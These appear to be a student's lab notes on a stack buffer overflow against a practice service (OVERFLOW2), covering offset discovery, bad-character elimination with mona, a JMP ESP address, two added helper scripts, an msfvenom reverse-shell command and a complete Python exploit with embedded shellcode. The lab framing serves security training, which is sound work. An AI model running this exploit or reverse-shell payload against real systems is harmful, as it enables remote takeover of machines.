It's the same thing as prep 1, but I'm still writing it because these are my notes.
It crashes at 630; there is no point being this precise.
If you send only "A" characters you won't be able to read the offset from EIP; you need a pattern.
https://wiremask.eu/tools/buffer-overflow-pattern-generator/
Since it crashes between 600 and 700, let's build a string of 300 "A" + a 400-byte pattern.
EIP = 0x6c41316c, which is at offset 334 in the pattern.
Offset 334 means 300 "A" + 334 bytes into the pattern.
So now I can do 300+334=634: "A"*634 + "B"*4.
View > Log (Alt+L)
!mona findmsp -distance 600
42424242 is my BBBB, so I have found EIP.
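Added example, not from the notes: a small reimplementation of what the pattern generator linked above and mona findmsp compute, so the 334 and 634 figures can be checked offline. It assumes the Metasploit-style alphabet (uppercase, lowercase, digit) that the generator uses.

```python
import struct
import string


# Added example (not from the notes). The pattern repeats 3-byte chunks:
# one uppercase letter, one lowercase letter, one digit (Aa0Aa1Aa2...).
def pattern_create(length):
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length=400):
    """Offset in the pattern of the 4 bytes that landed in EIP.

    x86 is little-endian, so the dword shown by the debugger has to be
    packed with "<I" before searching. Returns None when the value is
    not part of the pattern (e.g. 0x41414141 from an all-"A" buffer).
    """
    pattern = pattern_create(length).encode()
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def total_offset(eip_value, prefix_len=300, length=400):
    """Distance from the start of the buffer to EIP: the "A" prefix plus
    the position inside the pattern (300 + 334 = 634 in these notes)."""
    inner = pattern_offset(eip_value, length)
    return None if inner is None else prefix_len + inner


if __name__ == "__main__":
    print(pattern_offset(0x6C41316C))   # 334
    print(total_offset(0x6C41316C))     # 634
    print(pattern_offset(0x41414141))   # None: an all-"A" buffer tells nothing
```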
Finding Bad Characters
For mona:
!mona bytearray -b "\x00"
For my script:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
Restart the program, then:
nc 10.10.35.232 1337 <<< "OVERFLOW2 "$(python -c 'print( "A"*634 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')
!mona compare -f C:\mona\oscp\bytearray.bin -a esp
I got it: it's because I'm using bash instead of Python, so there is probably an encoding problem.
import socket

ip = "10.10.35.232"
port = 1337
prefix = "OVERFLOW2 "
offset = 634            # bytes before EIP (300 "A" + 334 into the pattern)
overflow = "A" * offset
retn = "BBBB"           # lands in EIP, shows up as 42424242 in the debugger
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # latin-1 maps every \xNN escape to the same single byte on the wire
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()
BadChars: \x00\x23\x3c\x83\xba
!mona bytearray -b "\x00\x23\x3c\x83\xba"
I modify my payload to remove the bad chars.
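Added example, not from the notes: a simulation of the bad-character loop that !mona bytearray and !mona compare automate. The target behaviour is constructed for the demo (it silently drops the five bytes the notes found); the point is that one compare only reveals the first bad byte, because everything after it is shifted, which is why the list grows one round at a time.

```python
# Added example (not from the notes). SIMULATED_BAD is constructed to
# match the bytes the notes found; a real target is only observed
# through the debugger, never assumed.
SIMULATED_BAD = {0x00, 0x23, 0x3C, 0x83, 0xBA}


def bytearray_without(excluded):
    """Same idea as '!mona bytearray -b "..."': all 256 values minus excluded."""
    return bytes(b for b in range(256) if b not in excluded)


def simulated_target(buf):
    """Constructed stand-in for the service's copy of the buffer at ESP."""
    return bytes(b for b in buf if b not in SIMULATED_BAD)


def first_mismatch(sent, seen):
    """Like '!mona compare': (index, expected byte) of the first difference,
    or None when the whole array arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i, b
    return None


def find_bad_chars(target, initial_excluded=(0x00,)):
    """Repeat send/compare, excluding one new byte per round, until the
    array arrives unmodified. Returns the sorted list of bad characters.
    Always terminates: the excluded set only grows, and an empty array
    trivially compares equal."""
    excluded = set(initial_excluded)
    while True:
        sent = bytearray_without(excluded)
        seen = target(sent)
        hit = first_mismatch(sent, seen)
        if hit is None:
            return sorted(excluded)
        _, bad = hit
        excluded.add(bad)


if __name__ == "__main__":
    found = find_bad_chars(simulated_target)
    print(" ".join("\\x%02x" % b for b in found))  # \x00\x23\x3c\x83\xba
```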
Find the jump point
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
So 625011af, which is \xaf\x11\x50\x62 in little-endian.
This will be our JMP ESP address; we need to place it in EIP, in place of the BBBB.
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
Generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4848 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c
Output: the encoded shellcode, which goes into the payload variable of the exploit below.
Exploit
import socket

ip = "10.10.35.232"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"   # 0x625011af (JMP ESP) in little-endian
padding = "\x90" * 16       # NOP sled before the shellcode
payload=("\xfc\xbb\xcf\x2d\xa4\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01"
"\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x33\xc5\x26"
"\x5e\xcb\x16\x47\xd6\x2e\x27\x47\x8c\x3b\x18\x77\xc6\x69"
"\x95\xfc\x8a\x99\x2e\x70\x03\xae\x87\x3f\x75\x81\x18\x13"
"\x45\x80\x9a\x6e\x9a\x62\xa2\xa0\xef\x63\xe3\xdd\x02\x31"
"\xbc\xaa\xb1\xa5\xc9\xe7\x09\x4e\x81\xe6\x09\xb3\x52\x08"
"\x3b\x62\xe8\x53\x9b\x85\x3d\xe8\x92\x9d\x22\xd5\x6d\x16"
"\x90\xa1\x6f\xfe\xe8\x4a\xc3\x3f\xc5\xb8\x1d\x78\xe2\x22"
"\x68\x70\x10\xde\x6b\x47\x6a\x04\xf9\x53\xcc\xcf\x59\xbf"
"\xec\x1c\x3f\x34\xe2\xe9\x4b\x12\xe7\xec\x98\x29\x13\x64"
"\x1f\xfd\x95\x3e\x04\xd9\xfe\xe5\x25\x78\x5b\x4b\x59\x9a"
"\x04\x34\xff\xd1\xa9\x21\x72\xb8\xa5\x86\xbf\x42\x36\x81"
"\xc8\x31\x04\x0e\x63\xdd\x24\xc7\xad\x1a\x4a\xf2\x0a\xb4"
"\xb5\xfd\x6a\x9d\x71\xa9\x3a\xb5\x50\xd2\xd0\x45\x5c\x07"
"\x76\x15\xf2\xf8\x37\xc5\xb2\xa8\xdf\x0f\x3d\x96\xc0\x30"
"\x97\xbf\x6b\xcb\x70\xca\x63\xe1\x27\xa2\x71\x05\x3a\xc3"
"\xff\xe3\x50\x33\x56\xbc\xcc\xaa\xf3\x36\x6c\x32\x2e\x33"
"\xae\xb8\xdd\xc4\x61\x49\xab\xd6\x16\xb9\xe6\x84\xb1\xc6"
"\xdc\xa0\x5e\x54\xbb\x30\x28\x45\x14\x67\x7d\xbb\x6d\xed"
"\x93\xe2\xc7\x13\x6e\x72\x2f\x97\xb5\x47\xae\x16\x3b\xf3"
"\x94\x08\x85\xfc\x90\x7c\x59\xab\x4e\x2a\x1f\x05\x21\x84"
"\xc9\xfa\xeb\x40\x8f\x30\x2c\x16\x90\x1c\xda\xf6\x21\xc9"
"\x9b\x09\x8d\x9d\x2b\x72\xf3\x3d\xd3\xa9\xb7\x5e\x36\x7b"
"\xc2\xf6\xef\xee\x6f\x9b\x0f\xc5\xac\xa2\x93\xef\x4c\x51"
"\x8b\x9a\x49\x1d\x0b\x77\x20\x0e\xfe\x77\x97\x2f\x2b\x77"
"\x17\xd0\xd4")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # latin-1 maps every \xNN escape to the same single byte on the wire
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()
Indeed, it works better when I use the right tools.
Conclusion
- Find where it's crashing (approximately)
- Remove 200 chars, and add a 300-byte offset before the pattern to locate where in the buffer it's crashing
- Add BBBB to be sure I'm at EIP
- Generate the bytearray with mona and inject the same bytes after BBBB using the script (it does not work with bash)
- Find the bad chars
- Find the jump
- Create the payload without the bad chars
- Put the JMP ESP address in EIP, then the NOPs, then the payload